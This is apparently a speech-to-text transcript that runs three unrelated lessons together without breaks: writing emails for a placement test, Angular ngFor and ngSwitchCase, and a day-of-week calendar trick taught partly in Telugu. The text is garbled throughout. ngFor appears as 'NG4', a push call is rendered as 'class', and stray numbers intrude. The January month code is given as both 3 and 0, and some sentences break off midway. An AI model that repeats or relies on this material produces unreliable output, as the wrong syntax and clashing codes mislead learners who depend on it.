minutes, you may not be able to submit. So please submit it before 10 minutes. And the word count should be over and above what is mentioned in the instruction. Now here are the don'ts. Do not miss even a single keyword or phrase. Do not change the tense or the verb form of the keyword. Do not exceed the 10-minute mark. Do not write the email below the number of words given in the instruction. Okay. Now here is the question again. As a loanee is a person of Andhra Bank, Mr. Kiran Kumar, requesting him to start ECS, which means electronic clearing. Means every month you don't have to go to the bank. You can give an instruction. It's called a standing instruction. Once it's approved, the amount will be automatically debited from your account and it will be credited to the loan account. So you want to avail for this service. So basically you don't have to go to the bank. Installments, branch, travel, challenge, miss, penalty,
electronic clearing services, easy, hassle free, anytime, schedule, request, initiate. Okay. Now let me show you how to write this email. Now I am starting the email with hello Mr. Anil Kumar. I can use the full name or I can just say hello Mr. Kumar. Please remember, when I am using a title is title, I need to use a full stop and there should be a space after that. That's a rule. After writing the greeting, I should not be using a comma. That's not needed. I'll go to the next line and my email should have 3 blocks. The first one is not leave a gap in the left. What do I mean by that? Let me show you. Okay, now a lot of people make a mistake, they leave a gap like this. This is incorrect. The entire email should be left. Housing loan account or housing loan I have availed from your bank. Okay, next paragraph. This is introduction. Says Mr. Kiran Kumar and the sender is Anil, but I made a mistake here. It should be Kiran Kumar. Okay. Now the rule says it should be a minimum of 50 words. So let's quickly check if I've used 50 words. It says 114 words, which is absolutely fine. Secondly, the entire email is left indent. Third, I have the introduction, I have the main body, and then I have the summary. I have the closing, I have the greeting here, everything is fine. Now, second one,
account, third monthly installments, fourth branch, then travel, challenge, miss, penalty, electronic clearing services, easy, hassle free. Hassle free means trouble free. Anytime, schedule, request and initiate. This is request, then I have initiate. So I have used all the keywords. Secondly, I have used more than 50 words. Now let's quickly check the punctuation. Now I started a new paragraph in a new line. Every time I use a full stop, the next word should start comma, not before. So the space should be after the comma. Please keep that in mind. Comma there, this is not needed, and the name which is mentioned in the topic. So here is my entire email, and I have written within 10 minutes. I have also checked it meets all the criteria. Okay. So email is the section where a lot of students have failed in the past, and these emails are very, very easy. If you pay attention, if you practice a lot, these emails will be very easy for you. So I'm going to prepare one more question for you right away. The email, so that you can practice. Okay, as a fresher, write an email to the HR manager, Miss Pooja Verma, in Tata Consultancy Services, seeking any open position in the organization. Sign off the email with your name. Now I am going to write the keywords. These are going to be the keyword. I hope this is visible to all of you. The email is, as a fresher, write an email to the HR manager, Ms. Pooja Verma, in Tata Consultancy Services, seeking any open position in the organization. Keen, aspire, career, internship, full-time, platform. Okay, these are of 60 words, 60. I am going to pause here so that you can make a note of this. Then I'll quickly check the YouTube video if anybody.
So those who are watching on YouTube, you can post your question here. To use Okay, I hope this is clearly visible now for everybody. All right, let's begin. There you go. That's it. So I have an introduction. I have the main body. Then I have the summary as well. Now let's count how many words I have used. Pooja Verma, I am writing to you to seek out, sorry, this out is not needed, to seek any open position for freshers in your esteemed organization. I enclose my updated resume for your reference. I am very keen to start my career with an organization where I aspire to grow professionally.
I would be happy to know if there are any opportunities for internship or even a full-time role, as I seek a platform BSc. Now instead of BSc, I've used Bachelor of Science. Now what happens is I will get disqualified because the system is looking for BSc. If I use BSc, I don't have to use the word stream. Keen, aspire, career, internship, full-time, platform. Okay, so I have used topic. Okay, so that's a perfect email. Let me quickly check if there are any questions. Dasari Hema is asking, sir, email writing will be conducted on paper or on system? Now email writing is a part of online assessment. Online, it will be online examination. Okay, so it will be online, not on paper. So let me quickly respond. You can post your comment on the YouTube channel even after. Take you through the pattern again. This is for the benefit of those who came in late. This is an online test. Whatever you see here is going to be online. So one email within 10 minutes to be answered. Aptitude, quantitative aptitude, 20 questions to be answered in 40 minutes. You have negative marks of 0.33%. You have 20 minutes. So that's the entire pattern of the online assessment. Okay, so I hope this was helpful. If you have question and provide you the answer. Okay, so I hope to see you guys again tomorrow. Have a great day. Bye bye. Welcome to Web Technologies training program. In the today's lesson, we are going to look forward for understanding NG4. In the previous lessons, we have created the components, we have worked with the data bindings, we have worked with the modules, decorators and directives. So today mainly we are going to understand, and I have explained about the introduction to directives. A directive is a predefined class which do some particular operation on the input. For example, we have a list of products in the array played in the output. For this kind of tasks, we have to use NG4. So in real-time applications, you will be having NG4. So let's try to understand the syntax of NG4 practically. So the syntax of NG4 is, first we have a tag, and inside the tag we have to provide star NG4. Let's specify the name of the array from which you want to read the data. Of is a predefined keyword to specify the array name. Here given to respective variable. Here let is a keyword to declare or create this variable. NG4 is meant for reading the data from an array. Here star means micro syntax. That means it is not a single variable name. It is that this part is a micro syntax. We have to use star. And NG for angular, for is meant for loop. This is the understanding of the NG for syntax. Application somewhere else we have to create the NG for. For example, we have something called products component. Let's create a new component called products. CDC colon angular 3 pm app 1 G for generate component. We are going to create a component called products.
Here products is name of the products.component.css, HTML and spec.ts have been created. Now the products.component.html has been created here. Okay, there is a folder called products and there we have products.component.ts. Here we have to create the name of the array from which you want to read the data. Presently this implements on init is not required, so I am just erasing it and deleting this of array string array. We are going to store the list of products inside the products array. So this dot products is equal to, there is an array with product 1, product 2, product 3, 3 products we have. So these 3 products I want to read the data into the HTML file and I want to display the same data. We are going to generate a p tag for every product. Here we have 3 products, add ng for. Exactly which tag needs to be repeated, for that tag only we have to keep ng for. It's star. So star ng for, we have to provide let variable name product of products. That means from this products array we are going to read the data into the variable product. Each time we are going to display the product. So save this and run this. Okay, there is no routing for this. Let's create a routing for this. Go to app.module.ts. We have to import products component already imported. Then we, whenever the URL is products, then we are going to invoke products component. So we can see products array. It has repeated the p tag. We have written the p. Okay, now let's add some meaningful product name. For example, coffee, juice and milk. I just provided, so we have to convert this product into UL tag. I am going to place some UL tag. Tag will be repeated here, UL or LI. LI tag will be repeated, displayed. We can also do one thing, right click inspect element. In the inspector window we can notice I want to allow the user to add the new record and delete existing record. So assume we are having some existing data, whatever the place delete existing record. This is the next modification that we are trying to do. In order to allow the user to item to add and other one is item to delete. So let's check it. In the products.component.ts we have created new product string array and then here we have to create a text. This is binded with new product. That means whenever the user has entered some value in the text box or present here. So I am just typing some value. This value gets updated into which property? The new, when the user clicks on a button. Let's create a button method called on add click. In this on add click we are going to add the new data to the existing products. So this dot products dot push of this dot new product. That means we are going to read the data from the new, we are going to read the data from the new, same will be displayed in the ng for. Ng for will execute, regenerate the output automatically. So any product name, whatever you type there, first this value is being added to the new product property, and when we click on add button, this value is being added to the existing array.
Notice we have written the code for adding the value by the end. This text box should be clear or empty. To clear the text box, what we have to try to do, this dot new product is equal to empty. So this new product property is going to be empty there. So after adding the name, I click on add button, automatically the text box becomes empty. Like this we can keep on adding any number of names. And same like this, I would like to allow the user to remove existing item. In order to create a remove button inside the ngFor, we have to create input type equal to button. Input type equal to button, value is equal to remove. When the user method call on remove click, when we click on the button, it is going to call a method call on remove click. But here the question is, how do we know which item needs to be removed? Either user has clicked on the first remove button or second remove button. How do we know that point? Presently you click on any remove button here, it is clicked by user. We have to pass the index as argument. But how do we know the index? If it is a for loop, generally we will use I, predefined variable. We are going to assign the same value into the local variable I. That value needs to be passed to on remove click function, and that value needs to be received here, which is of number type, and I am going to display the index. So when I click on remove, see, we can see the index, that is 0 here, next 1 here, next 2 here, and the corresponding index, which one is exactly clicked, that index we are going to see. Based on the index, we can easily remove the item. In order to remove the item, products of dot splice of index comma 1. Here I for index and 1 is indicating the number of records to be removed. I want to remove only one element at the position number I. Moving, I would like to ask the confirmation message from the user. So if confirm of, are you sure to delete, if the user clicks on yes, then only we have to remove it. The user clicks on OK button. So before removing, I am asking the user, do you want to delete? If I click on cancel, nothing is being removed. If I click on OK, then only it is being removed. Check again. So I click on remove for the juice. So I just OK, then the item is being removed. Demonstrates how to manipulate a simple array as just a string array. But in real-time applications, the requirements will be much more complex. You have to maintain some table type of data. Suppose you have to complex object. So in the earlier lessons, we have explained about the object array. So we have to store the object array. So in this example, we have something called ngg component employee. ngg component employee. Okay, we have a component called employees component, and I want to display this component is equal to employees component. Employees component. Now what I want to try to do, I would like to create necessary hyperlink in this. So I just go to app.component.html. So I just create a new hyperlink for both of these. So first one is for products, which was the previous example,
and now employees, which is the current example. Employees component, in this employees component, what we are trying to do, I am just removing all these things. Okay, so we are just opening employees component, employee component and that corresponding template. So first we are going to create a model class which represents to maintain. So we have to create a model class that represents the structure of the data. Let's create a model class called employee. So in this example, I am going to create a new model class. Here class means model class. Name of the class is employee. So employee class has been created. It is not a component, it is just a class, just to define the structure of the data to maintain. For the structure of the data, which include salary, and a constructor, I am going to receive, we are receiving 3 values and assigning into the respective properties. Now I need to create an array of employee array type. So here I am going to create employees is the name of the array, is of which type? Employee type. In the constructor we have to initialize the data, that is this dot employees is equal to an array. In this array, new employee, we have to provide employee ID number, employee name and salary. So we have created 3 objects of employee type. I am going to maintain them as an array. Okay, so once we created this array, okay, we have some values. Okay, I would like to assign this particular data into which array? Employees array, and I want to read the data from this employees array. So div heading, that is employees, table tr, employee ID, employee name, salary. For this table we have to provide the bootstrap style of table. So class is equal to table, and what tag needs to be repeated here? tr tag needs to be repeated. Let employee of employees. From the employees array we are going to read the data into which variable? Employee variable. So which tr will be loaded, which tr will be repeated automatically for every record? This particular tr. So we are reading the data from the employee, and based on that we are displaying. You can see all the list of employees have been displayed as a result. Let's apply some background color for the first row. So okay, BG secondary, no, table secondary, and I want the text color should be black. Okay, that's by default black. Now I would like to provide adding and removing functionality for this. I am going to create a new tr with input type equal to text, placeholder is equal to employee ID. Here user is going to enter the values respectively employee ID, name and salary. So once the user has entered the values, and they have to click on some add button or insert button, then this data has to be value equal to insert. When the user
So when the user clicks on this insert button, we are going to call a method called on insert click. In this one, I can write some logic. So, but how do we capture these values? First of all, they should be binding for these text boxes. Which of the values the user has entered, these particular values must be read programmatically, and then these values should be inserted into the array. But in order to read the text box values, there is no direct coding. Text box values needs to be binded to some property. Through the property only we can read the value. Here we have to create a new product type of new employee type of object. Through the new employee type of object only we can read the values. So let's create a property in the component. So check it. Here we have a new EMP of employee type of object. We are going to instantiate it, that means creating an object for it, corresponding output. I want to bind this new EMP to the respect to text boxes. Here in the first, for the second one, new EMP dot EMP name, new EMP dot salary. Enter the values in the respect to text boxes. These values will be automatically updated into respect to properties. Now through these properties we are able to read the values. In this method we are going to say this dot employees dot class. How do we pass the employee ID? This dot new EMP dot employee ID, which is representing the first text box value, right? Now same like this, employee name and salary values. So we are passing the employee ID, employee name and salary values, and these values are going to be created as a new object and added the same to the employees array. Okay, so check there. I'm just entering the values and click on insert button. So the values have been added. Generally after adding the new values, what we expect, the text box value should be clear, right? To clear the text boxes out, this dot new EMP dot employee ID is equal to null. We are going to assign to null so that it will be. Click on insert button. These values are going to be inserted there. Which same like this we are going to create deleting functionality. I am going to create a delete button for every record. When the user clicks on the delete button, I am going to delete the corresponding record. Let's try to do it. So here in the template, inside the ngFor, we are going to create input type equal to button, value is equal to remove or delete. When the user clicks on this delete button, the method on delete click. But how do we know which record is currently clicked? So what we have done before a moment in the previous example, we have passed the index. How to get the index? Let I is equal to index. We are going to store the index into the variable I, and then we are going to pass the index value here, and that I value can be received here. First we are getting the index into the variable receiving here. Based on that we are trying to first ask the user, then we delete it. Are you sure to delete? So if the user clicks on OK, then what do you want to do? This dot employees dot splice of I comma 1. That means based on the index we are going to remove the first record. So when I click on delete, if I click on OK, that record is being removed. We can notice practically. When I click on cancel, it is not deleting anything. So we can add the new record also. So we can perform inserting as well as updating.
So this is how to manipulate ngFor. So ngFor is all about how to read the data from an array, displaying the same, and also allowing the user to manipulate it. Okay, now let's try to understand the another one, that is ng switch case. Just like in programming, we have switch case to read the data from the variable and check whether it is matching with any one of the cases or not. Similarly, in the component template also we can use a switch case. For example, based on the month number, I want to display the month name. So we can do that by using switch case. Let's understand the switch case in the components practically. So check there, we have let's have joining month. One more extra property called joining month. So we have a property called joining month. Here I want to store the month number. So in the component I would like to pass one extra value, for example 7th month, January. Okay, so I'm providing different values. So what do you want to try to do? I just want to pass the new emp dot joining month also. Okay, so we have successfully added the column called joining month. I want to display the joining month in the output. So let's have a th joining month employee dot joining month. So presently what's happening, only the joining month number is being displayed. Instead of joining month number, I want to display the month name. How do we display the month name? We are going to write the ng switch case. Now span equal to which property? Employee dot joining month. Then ng switch case span ng switch case is equal to 1. So if it is 1, we are going to display the John. Let's repeat the same for all months. Respectively the month names. Okay, I'm just going to fill going to be appear. At the same time, only one month will match, but whichever the month is matched, only that name will be appear in the output. So finally, we can see all the corresponding month names. Like this, we are able to use a switch case. So in this way, how to manipulate arrays. This is all about next topic. Hello everyone, how we are going to solve the questions under the calendars. See, today I'm going to teach you the best method. See, best method when it comes of problem solving. See, when it comes to, but నేను ఈరోజు మీకు చూసారంటే ఉన్నదంటే షార్టెస్ట్ మెథడ్ అండ్ ఈజియెస్ట్ మెథడ్ మీకు నేను టీచ్ చేస్తాను. బట్ హియర్ యు ఆర్ సపోజ్ టు రిమెంబర్ సర్టెన్ థింగ్స్ బిఫోర్ యూ గెట్ ఇన్ టు ద ఎగ్జామినేషన్. మనం ఎగ్జామ్లో వెళ్ళి కొన్ని మెథడ్స్ని అక్కడ సాల్వ్ చేయడానికంటే కూడా కొన్ని ముందుగానే మనం గుర్తుపెట్టుకొని వెళితే అక్కడ సొల్యూషన్ పార్ట్ అనేది 15 to 20 seconds లోపల మనం ఆన్సర్ని తీసుకురావచ్చు. లెట్స్ సీ హౌ ఇట్ వర్క్స్. ఫస్ట్ ఆఫ్ ఆల్ లెట్స్ స్టార్ట్ విత్ calendar. All right, how we are going to solve these questions? So first, month codes. Let's start with month codes. So let's
let's write one by one. January, the code is 3. Then March, the code is 3. And then April, and then code is 4. So 0, 3, 3, 6, 1, 4. And then let's go with July. The code for July month is 6. And then August, it is, for August it is like 2. And then September, and the September it is 5. And then October, and then it is 0. For November it's going to be 3, and for December it's going to be 5. So I repeat the codes. ఈ కోడ్స్ మీరు ఏంటి అని చూసారు అంటే, సి క్యాలెండర్స్ ప్రాబ్లమ్స్ విత్ ఇన్ 15 to 20 సెకండ్స్ మీరు ఆన్సర్ తీసుకురావాలంటే ఈ పర్టికులర్ కోడ్స్ అనేది మనం ఫాలో అవ్వాలి. సో వీ హ్యావ్ టు రిమెంబర్ 3 డిఫరెంట్ కోడ్స్. ఫస్ట్ ఏంటంటే మంత్ కోడ్స్. ఈ మంత్ యొక్క కరస్పాండింగ్ కోడ్స్ అనేది మీరు గుర్తుపెట్టుకోవాలి. అండ్ దెన్ మీరు చూసినట్టయితే ఇయర్ సెంచురీ కోడ్స్, ఇయర్స్కి మనం కొన్ని గుర్తుపెట్టుకోవాలి. అండ్ దెన్ డే కోడ్స్. సో 3 డిఫరెంట్ కోడ్స్ ఉన్నాయి. సో దీస్ ఆర్ ద కోడ్స్ ఫర్ ద మంత్ రెస్పెక్టివ్. 6 August it is 2, September it is 5, October it is 0, and November it is 3, December it is 5. So these are the corresponding codes for the respective months. Alright, now let's talk about century codes. Let's talk about century codes. Okay, century, what does mean by a century? Century is nothing but 100 years. 10 years ni manam decade అని పిలుస్తాం. 10 years అంటే decade. 100 years అంటే we call it as century, and 1000 years అంటే we call it as a millennium. Alright, now century codes మీరు చూసినట్టయితే let's start with 1900 to 1999. So 1900 to 1999, so obviously 100 years for 1 century, and here the code is obviously 0. Alright, now next మీరు చూసినట్లయితే 2000 to 2099. Here the code is 6, and then 2100 to 2199. For this 100 years it is 4, and then 2200 to 2299, and the code is 2. I repeat this, 2200 to 2299, the code is 2. Alright, and then ఈ కోడ్స్ ఎలా వర్క్ అవుతుందని మనం చూసినట్లయితే, సో ఇట్ ఇస్ లూప్లో వర్క్ అవుతుంది. ఐటరేషన్ ఇన్ ద సెన్స్, ఫర్ ఎగ్జాంపుల్, ఎందుకు ఈ పర్టికులర్ 4 centuries మాత్రమే ఇచ్చాను అంటే, ఇట్ ఇస్ సో సింపుల్. సి మీ క్వశ్చన్స్ ఎగ్జామినేషన్స్లో మీకు మెజారిటీ ఆఫ్ ద క్వశ్చన్స్, 90% ఆఫ్ ద క్వశ్చన్స్ ఈ పర్టికులర్ 4 centuries నుంచి అడుగుతారు. ఫర్ ఎగ్జాంపుల్ వీటి నుంచి, ఫర్ ఎగ్జాంపుల్ 1732 అంటే ఇయర్ 1732కి కోడ్ ఏమొస్తుందంటే, ఇక్కడ నేను రాయలేదు, బట్ ఎలా దాన్ని మనం ఫెచ్ చేసుకోవాలి ఎగ్జామినేషన్ అంటే, ఇట్ ఇస్ సో సింపుల్. జస్ట్ హ్యావ్ ఎ లుక్ అట్ దిస్. ఫర్ ఎగ్జాంపుల్ ఈ పర్టికులర్ 4 centuries మెన్షన్ చేశాను కదా. లెట్స్ సే దీని వెనుకో ముందో అడిగితే, తర్వాత అడిగితే ఎలా చేయాలి. ఫర్ ఎగ్జాంపుల్ 1899కి ఎలా ఉంటుంది, అండ్ దెన్ 1700 to 1799 ఎలా ఉంటుంది, అండ్ దెన్ 1600 to 1699 ఎలా ఉంటుంది, 1500 to 1599 కోడ్ ఏంటి. సేమ్ అప్లికబుల్ హియర్ యాజ్ వెల్. 2300 నుండి 2399కి వాట్ ఈస్ గోయింగ్ టు బి ద కోడ్, అండ్ దెన్ 2400 to 2499 what's the code, and then 2500 to 2599 what's the code, and then 2600 to 2699 కోడ్ ఏంటి అంటే, ఇట్ ఈస్ సో సింపుల్. మనకు ఉన్న డేటా నుండి మనం ఫెచ్ చేసుకుంటే సరిపోతుంది. లెట్స్ సే 1900 to 1999 నేను మీకు కోడ్ ఏం చెప్పాను, 0, and here it is 6, and then 4, and then 2. ఇట్ ఈస్ సో సింపుల్. ఈ 0642 అనేది రిపీట్ అవుతూ వస్తుంది, అంటే 0642, and then here it is 0642, and then once again 0642. ఇది ఒక ఐటరేషన్లో రన్ అవుతుంది. ఇట్ డజంట్ మీన్ ఫస్ట్ సెంచరీ 0తో స్టార్ట్ అవుతుందని చెప్పట్లేదు, ఇది ఇలాగే 0642. సో ఈ తర్వాత కూడా 0642, అండ్ దెన్ ఫర్ ఎగ్జాంపుల్ మీకు ఇప్పుడు 2700కి కావాలి, 2700 to 2799, ఇట్ ఈస్ వన్స్ అగైన్ 0. ఐ హోప్ యూ అండర్స్టాండ్ హౌ దిస్ వర్క్స్. 0642 అని ఇలా ముందుకు, కానీ మీరు వెనక్కి వెళ్ళినా సేమ్ హియర్ 0642 అంటే 1500 to 1599 ఇట్స్ గోయింగ్ టు బి 062. ఆల్రైట్, సో అట్ ప్రెసెంట్ మనం ఈ పర్టికులర్ సెంచురీలో ఉన్నాం, అంటే 21st century. సో 2000 to 2099. సో ఆల్రైట్, సో దీస్ ఆర్ ద మంత్ కోడ్స్ అండ్ దీస్ ఆర్ ద సెంచురీ కోడ్స్. లెట్స్ సీ వాట్ ఆర్ ద డే కోడ్స్. అపార్ట్ ఫ్రమ్ దిస్ we need to remember the day codes as well. I hope you made a note of all these things. Now let's talk about day codes. So day codes మీరు చూసినట్లయితే, so Monday it's obviously 1, and then Tuesday it is 2, and then Wednesday it is 3, then Thursday it is 4, and then Friday
it is 5, and then Saturday it is 6. Sunday, guys, remember it is not 7, it is going to be 0. Manaki calendars lo ekkada kani 7 ane number radu ee particular day codes lo. So at any cost, Sunday is not 7, Sunday is 0. It is 1, for Tuesday it is 2, for Wednesday it is 3, for Thursday it is 4, for for Friday it is 5, for Saturday it is 6, for Sunday it is going to be 0. Alright. So these are the codes which we need to remember. 2000 to 2099 it is going to be 6, 2100 to 2199 it is going to be 4, and then 2200 to 2299 it's going to be 2. And before and after we need to calculate it and do it accordingly. Majority of the questions particular years చూసినట్టయితే ఈ 4 centuries లోనే ఉంటుంది. ఒకవేళ లేకపోయినా we know how to go back and go forward. Am I right? Now, so how to solve the questions under calendars. So మీరు basic level లో మీరు చూసినట్లయితే first thing, see it is going what was the day on or what was the day of the week and so and so particular date లో ఏ particular day అనేది. For example, let's start with the basic question. What was the day on 15 August 1947? I repeat, what was the day on 15 August 1947? So why I started with this question? So it's a like memorable question. 15th August 1947 is nothing but Friday. A particular day, a particular date lo a day ochindante, it was actually Friday. Alright, but దీన్ని మనం ఎలా క్యాల్కులేట్ చేయాలి, ఈ పర్టికులర్ కోడ్స్ యూస్ చేసి మనం దీన్ని ఆన్సర్ ఎలా తీసుకురావాలి విత్ ఇన్ 30 seconds ఇస్ గోయింగ్ టు బి ద డీల్ ఫర్ us. ఆల్రైట్, నా ఈ నోట్ మీరు ఆ పర్టికులర్ ప్రొసీజర్లో సబ్స్టిట్యూట్ చేసే ఒక నోటేషన్లా మనం ఒకటి ఫామ్ చేస్తాం. మీరు ప్రొసీజర్లో అది జస్ట్ ఆ నోటేషన్లో మీరు వాల్యూస్ని సబ్స్టిట్యూట్ చేసినట్లయితే you'll get the answer for this. Alright, now let's see what is the procedure. What is the procedure? Just make a note. Okay, now let's start with one by one. Given date, guys, it's a kind of 5 things here in the numerator, and denominator it's going to be one numeric value, so you need to adjust accordingly and write. So first thing here, it is given date. The first parameters, meeku numerator lo 5 parameters untundi. First meer em rasarante given date, am I right? And the second one, month code. Second parameter, first parameter it is I'm just going to mark this first parameter, and the second parameter month code, and then the third parameter entante century code. First given date, month code, then century code, and last two digits of the given year. Last 2 digits of the given year. And then what is the fifth parameter? It is so simple. Number of 4 multiples last 2 digits of the given year. Last 2 digits of the given year. And the fifth parameter, number of 4 multiples in the last 2 digits of the given year. Entire 5 parameters divided by 7. Entire 5 parameters is divided by 7. If you ask me 7, it is so simple. We have 7 days in a week. That's why it is 7. Alright, 5 parameters divided by 7. Now let's discuss one by one. What is my given date? Given date is nothing but the date which is given in the question. So mana question lo manaki em chesam. So 15 August ఏ డేట్ అయితే మీరు ఫైండ్ అవుట్ చేయాలనుకుంటున్నారో అది 15. Alright, and then month code. See, month code, most probably we need to write our date format in this way, 15 August 1947. And just for you, it's a suggestion, guys. Whenever you write the date, so I can see most of the students, they write like 15/08/1947. This is the format we are using. So which is nothing but idi meeku DD MM is better if you write the date in such a way, just because see most of the companies where we are working with is nothing but American companies. This is the format which is followed by the Britain people. Now American format ante meeku American format ante meeku em vachestunante once again MMDDYY. సో MMDDYY అనే ఫార్మాట్ కూడా ఇప్పుడు మీ కంప్యూటర్స్లో కొన్ని ఎలక్ట్రానిక్ డివైజెస్లో చూసారు. ఈ పర్టికులర్ కాన్ఫ్లిక్ట్ని మీరు అవాయిడ్ చేయడానికి ఇట్ ఈస్ బెటర్ ఇఫ్ యూ రైట్ ద మంత్ విత్ 3 letters ఫస్ట్. లెట్స్ సే ఫర్ ఎగ్జాంపుల్ ఇలా 15 ఇట్స్ నథింగ్ బట్ ద డేట్ అండ్ మంత్. ఇన్స్టెడ్ ఆఫ్ రైటింగ్ మంత్ నంబర్ 08, 07, 06ని రాయడానికి బదులు ఇట్స్ బెటర్ ఇఫ్ యూ రైట్ ఆగస్ట్. ట్రై టు అండర్స్టాండ్. ఫర్ ఎగ్జాంపుల్ మీకు ఎగ్జామ్లో
ఇలా 15/08/1947 ఇస్తే in the month code please don't write 08. This is just a month number. Alright, 08 అనేది month number. Don't do that. See, we know what is the month code. Code అనేది నేను మీకు క్లియర్గా చెప్పాను. Jan 6, Jan it is 0, for February it is 3. Am I right? రాయాలి. Please don't write month number. And century code, and it is so simple. Century code 1900 నుంచి 1999కి, 2000 నుండి 2099కి, 2100 నుండి 2199కి we know. So write when. సో మీకు ఇచ్చిన ఇయర్లో లాస్ట్ 2 digits మీరు నోట్ చేసుకుంటే సరిపోతుంది. అండ్ దెన్ ఫైనలీ నెంబర్లో 4 multiples అంటే ఏంటి? సో సింపుల్. నౌ లెట్స్ టేక్ అ నంబర్. ఫర్ ఎగ్జాంపుల్ 15 అనే ఒక నెంబర్ తీసుకున్నాం. ఈ 15 అనే నెంబర్లో 4 multiples are 12. Am I right? 4 3s are 12 and the remaining 3. So here the quotient is nothing but 4 multiples. ఫర్ ఎగ్జాంపుల్ 15లో ఎన్ని 4 multiples ఉంటాయి అంటే 15 లోపల 4 అనేది ఒక 4 multiple, 8 అనేది ఒక 4 multiple, 12 అనేది ఒక 4 multiple. మీరు 16 వెళ్ళిపోయారంటే అది 15 ఎక్సీడ్ అయిపోతుంది. సో మల్టిపుల్స్ అనేది ఆ పర్టికులర్ నెంబర్ లోపల ఉండేవి. సో 15 లోపల మీకు ఎన్ని 4 multiples ఉంటుందంటే 3 ఉంటుంది. ఫర్ ఎగ్జాంపుల్ ఇప్పుడు 40, 44, రిమైండర్ ఇస్ 1. సో వాట్ డస్ ఇట్ మీన్? 45లో 4 multiples ఎన్ని ఉంటాయి అంటే 11 ఉంటుంది. ఇట్ ఈస్ ఈజీ టు అండర్స్టాండ్ ది ఎంటైర్ థింగ్ డివైడెడ్ బై 7. And then finally you'll get the answer. So let's see how this works. And remember the century codes anything on the paper during examination. See, I'm teaching you this method just because in order to get the answer within 30 seconds, 15 to 30 seconds లోపల ఆన్సర్ తీసుకురావాలి. Sometimes we don't get the answer on time. We need more time to get it. Let's say calculations part ఎక్కువ ఉండేటప్పుడు ఏమవుతుందంటే 45 seconds అనేది మనం ఆన్ యావరేజ్ అనుకున్నాం. ఇనిషియల్ క్లాసెస్ నేను మీకు చెప్పినప్పుడు 45 seconds or 1 minute మీరు ఆన్సర్ తీసుకురావాలి. సో కొన్ని క్వశ్చన్స్ వేరాస్ 2 minutes 3 minutes పడుతుంది ఆన్సర్ తీసుకురావడానికి. అలాంటి క్వశ్చన్స్కి ఆ టైం మీరు ఎక్స్ట్రా స్పేర్ చేయాల్సి ఉంటుంది. అలాంటి క్వశ్చన్స్కి మీరు ఎక్స్ట్రా స్పేర్ చేయాలి అంటే ఈ క్యాలెండర్స్ క్వశ్చన్స్ అన్ని మీరు ఏం చేయాలంటే 30 secondsలో 15 secondsలో క్లోజ్ చేసినప్పుడు అయితే మనకు కొంచెం టైం సేవ్ అవుతుంది. ఆ టైం సేవ్ అయిన టైంని మనం వేరే టఫ్ అయిన టాపిక్స్కి క్వశ్చన్స్కి యూజ్ చేసుకోవచ్చు. నా సో దిస్ ఈ పర్టికులర్ అప్టిట్యూడ్ క్వశ్చన్ని ఈ 30 secondsలో తీసుకురావాలి అంటే ఈ కోర్స్ అన్ని మీరు గుర్తుపెట్టుకొని జస్ట్ సబ్స్టిట్యూషన్ మాత్రం మీరు వాట్ వాజ్ ద డే ఆన్ 15 August తెలుసు. I'm just going to substitute the values. First thing I said given date. Fantastic. Given date is 15. Given date is 1462503 We know August is the 8th month. So 1 2 3 4 5 6 7 8. So the code for August is nothing but 2. Avuna? So it is 02 or 2, however the way you want. Plus, so go with 0. Code is 0. Plus, now 1947 అన్నాను కదా. సో ఫర్ లాస్ట్ 2 digits ఏమవుతుంది 47 ప్లస్ అండ్ దెన్ వాట్ నెంబర్ ఆఫ్ 4 multiples in 47. 4 multiples in 47 మీరు ఏం చేస్తారు? జస్ట్ డివైడ్ 47 using 4. సో ఇట్ ఈస్ ఆబ్వియస్లీ 11s. Am I right? So it is 11 and so it is 44 and then 3. So how many? 11 4 multiples. 11 4 multiples by 7. 11 4 multiples by 7. Now just add everything. 15 plus 2 it is 17 and 17 plus 47 64. 64 plus 11 which is 75. So 75 by 7. And so this is the final answer what you have got. And guys please don't cancel here. దీన్ని క్యాన్సల్ చేయొద్దండి. ఓకే, క్యాన్సలేషన్ అంటే 7 1s are 7. ఇది మీరు క్యాన్సల్ చేసినట్లయితే 7 1 7 7.7. ప్లీజ్ డోంట్ డూ క్యాన్సల్ హియర్. డూ ద డివిజన్ అండ్ జస్ట్ ఫైండ్ అవుట్ ద రిమైండర్. సో డివిజన్ హియర్ ఇస్ నథింగ్ బట్ సో 75ని మీరు 7తో డివైడ్ చేసినట్లయితే ఇట్ ఈస్ 7 10s. సో దిస్ సింబల్ ఇండికేట్స్ ఇట్ సేస్ దట్ వీ హ్యావెంట్ డన్ ఎనీ కైండ్ ఆఫ్ క్యాన్సలేషన్ హియర్. మనం ఏం చేసామంటే 75ని 7తో డివైడ్ చేసాం అండ్ రిమైండర్ రాసాము ఇక్కడ అండ్ డివిజన్ చేసి రిమైండర్ రాసాము అని తెలియడానికి మీరు జస్ట్ ఆర్ అనే సింబల్ నోట్ చేసుకోవచ్చు. ప్లీజ్ డోంట్ డూ ఎనీ క్యాన్సలేషన్ హియర్. ఆల్రైట్, సో 5 అండ్ నౌ వీ నో దాట్ మండే. సో మనకు తెలిసింది ఏంటంటే మండే అంటే ఇట్ ఈస్ 1 ద డే కోడ్. ఐ రైట్? మండే అంటే 1, ట్యూస్డే అంటే 2, వెన్స్డే అంటే 3, Thursday అంటే 4 and 5 means Friday. That is what the code I have given. So answer is Friday. So ఈ particular number ని మీరు ఆ డే కోడ్ కి ఈక్వేట్ చేస్తే you'll get the Friday. As we discussed calendars మనం చెప్పినట్టు August 15th 1947 or 15th August 1947 it was Friday అని చెప్పాను. So this is how you need to find out. And remember whatever the procedure I have given to you, you have to store it for us to get the answer within this particular lesson. మీ examination లో మీ calculation just ఈ 2 lines మాత్రమే ఉండాలి. So this just like ఈ పర్టికులర్ పార్ట్లో మీరు ఏం చేశారు? వాల్యూస్ని సబ్స్టిట్యూట్ చేశారు అండ్ హియర్ ఒక డివిజన్ చేసి రిమైండర్ తీసుకొచ్చారు. ఆ రిమైండర్ని డే కోడ్కి మీరు ఈక్వేట్ చేశారు. దాట్స్ ఇట్.
